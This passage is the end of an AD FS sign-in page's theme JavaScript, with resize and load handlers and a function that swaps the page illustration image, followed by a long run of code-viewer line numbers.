window.detachEvent('onload', computeLoadIllustration);
window.detachEvent('onresize', computeLoadIllustration);
}
}
};
if (window.addEventListener) {
window.addEventListener('resize', computeLoadIllustration, false);
window.addEventListener('load', computeLoadIllustration, false);
}
else if (window.attachEvent) {
window.attachEvent('onresize', computeLoadIllustration);
window.attachEvent('onload', computeLoadIllustration);
}
// Function to change illustration image. Usage example below.
function SetIllustrationImage(imageUri) {
var illustrationImageClass = '.illustrationClass {background-image:url(' + imageUri + ');}';
var css = document.createElement('style');
css.type = 'text/css';
if (css.styleSheet) css.styleSheet.cssText = illustrationImageClass;
else css.appendChild(document.createTextNode(illustrationImageClass));
document.getElementsByTagName("head")[0].appendChild(css);
}
// Example to change illustration image on HRD page after adding the image to active theme:
// PSH> Set-AdfsWebTheme -TargetName <activeTheme> -AdditionalFileResource @{uri='/adfs/portal/images/hrd.jpg';path='.\hrd.jpg'}
//
//if (typeof HRD != 'undefined') {
// SetIllustrationImage('/adfs/portal/images/hrd.jpg');
//}
//]]>
</script>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987